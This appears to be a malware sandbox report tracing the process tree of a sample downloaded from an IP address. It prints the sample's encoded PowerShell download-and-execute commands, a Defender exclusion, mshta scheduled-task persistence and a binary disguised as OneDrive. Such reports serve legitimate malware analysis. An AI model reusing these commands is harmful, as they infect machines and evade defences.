Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

iexplore.execonhost.exe

pid	process
4260	iexplore.exe
4260	iexplore.exe
4260	iexplore.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe

Suspicious use of SendNotifyMessage 62 IoCs

Processes:

conhost.exe

pid	process
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe
2912	conhost.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

4260 iexplore.exe
4260 iexplore.exe
1128 IEXPLORE.EXE
1128 IEXPLORE.EXE
4260 iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exefile.exepowershell.exepowershell.exeNoSleep.execonhost.exepowershell.exefile.execonhost.exefile.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4260 wrote to memory of 1128	4260	iexplore.exe	IEXPLORE.EXE
PID 4260 wrote to memory of 1128	4260	iexplore.exe	IEXPLORE.EXE
PID 4260 wrote to memory of 1128	4260	iexplore.exe	IEXPLORE.EXE
PID 4260 wrote to memory of 4680	4260	iexplore.exe	file.exe
PID 4260 wrote to memory of 4680	4260	iexplore.exe	file.exe
PID 4680 wrote to memory of 2184	4680	file.exe	powershell.exe
PID 4680 wrote to memory of 2184	4680	file.exe	powershell.exe
PID 4680 wrote to memory of 4396	4680	file.exe	powershell.exe
PID 4680 wrote to memory of 4396	4680	file.exe	powershell.exe
PID 4680 wrote to memory of 1664	4680	file.exe	powershell.exe
PID 4680 wrote to memory of 1664	4680	file.exe	powershell.exe
PID 4680 wrote to memory of 2392	4680	file.exe	powershell.exe
PID 4680 wrote to memory of 2392	4680	file.exe	powershell.exe
PID 2184 wrote to memory of 508	2184	powershell.exe	schtasks.exe
PID 2184 wrote to memory of 508	2184	powershell.exe	schtasks.exe
PID 4396 wrote to memory of 1964	4396	powershell.exe	NoSleep.exe
PID 4396 wrote to memory of 1964	4396	powershell.exe	NoSleep.exe
PID 1964 wrote to memory of 2580	1964	NoSleep.exe	conhost.exe
PID 1964 wrote to memory of 2580	1964	NoSleep.exe	conhost.exe
PID 1964 wrote to memory of 2580	1964	NoSleep.exe	conhost.exe
PID 2580 wrote to memory of 3716	2580	conhost.exe	powershell.exe
PID 2580 wrote to memory of 3716	2580	conhost.exe	powershell.exe
PID 1664 wrote to memory of 1628	1664	powershell.exe	RegSvcs.exe
PID 1664 wrote to memory of 1628	1664	powershell.exe	RegSvcs.exe
PID 1664 wrote to memory of 1628	1664	powershell.exe	RegSvcs.exe
PID 1664 wrote to memory of 1628	1664	powershell.exe	RegSvcs.exe
PID 1664 wrote to memory of 1628	1664	powershell.exe	RegSvcs.exe
PID 1664 wrote to memory of 1628	1664	powershell.exe	RegSvcs.exe
PID 1664 wrote to memory of 1628	1664	powershell.exe	RegSvcs.exe
PID 1664 wrote to memory of 1628	1664	powershell.exe	RegSvcs.exe
PID 4432 wrote to memory of 3732	4432	file.exe	conhost.exe
PID 4432 wrote to memory of 3732	4432	file.exe	conhost.exe
PID 4432 wrote to memory of 3732	4432	file.exe	conhost.exe
PID 3732 wrote to memory of 4048	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 4048	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 4048	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 3732 wrote to memory of 2912	3732	conhost.exe	conhost.exe
PID 4260 wrote to memory of 2060	4260	iexplore.exe	file.exe
PID 4260 wrote to memory of 2060	4260	iexplore.exe	file.exe
PID 2060 wrote to memory of 1484	2060	file.exe	powershell.exe
PID 2060 wrote to memory of 1484	2060	file.exe	powershell.exe
PID 2060 wrote to memory of 1036	2060	file.exe	powershell.exe
PID 2060 wrote to memory of 1036	2060	file.exe	powershell.exe
PID 2060 wrote to memory of 4128	2060	file.exe	powershell.exe
PID 2060 wrote to memory of 4128	2060	file.exe	powershell.exe
PID 2060 wrote to memory of 3180	2060	file.exe	powershell.exe
PID 2060 wrote to memory of 3180	2060	file.exe	powershell.exe
PID 1484 wrote to memory of 4064	1484	powershell.exe	schtasks.exe
PID 1484 wrote to memory of 4064	1484	powershell.exe	schtasks.exe
PID 1036 wrote to memory of 1596	1036	powershell.exe	NoSleep.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://62.204.41.194/file.exe
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4260

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4260 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1128

C:\Users\Admin\Desktop\file.exe
"C:\Users\Admin\Desktop\file.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "OneDrive Standalone Update Task - S - 1 - 5 - 21 - 3301851721 - 4018334294 - 377670162 - 1001" /sc ONLOGON /tr "mshta http://62.204.41.194/c.html " /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4396

C:\Users\Admin\AppData\Roaming\NoSleep.exe
"C:\Users\Admin\AppData\Roaming\NoSleep.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABoAG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACIAJwApACAAPAAjAG0AeAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAbQB0AHUAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAdwAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAbgB3AHEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAG8AUwBsAGUAZQBwAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBlAHEAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwBmAGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Users\Admin\Desktop\file.exe
"C:\Users\Admin\Desktop\file.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "OneDrive Standalone Update Task - S - 1 - 5 - 21 - 3301851721 - 4018334294 - 377670162 - 1001" /sc ONLOGON /tr "mshta http://62.204.41.194/c.html " /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1036

C:\Users\Admin\AppData\Roaming\NoSleep.exe
"C:\Users\Admin\AppData\Roaming\NoSleep.exe"
4⤵
- Executes dropped EXE
PID:1596

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2152

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
1⤵
PID:4432

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "cvxjxkjice"
3⤵
PID:4048

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2912

C:\Users\Admin\Desktop\file.exe
"C:\Users\Admin\Desktop\file.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4900

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1120

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:4608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3752

C:\Users\Admin\Desktop\file.exe
"C:\Users\Admin\Desktop\file.exe"
1⤵
- Executes dropped EXE
PID:4440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
PID:2224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
PID:2204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
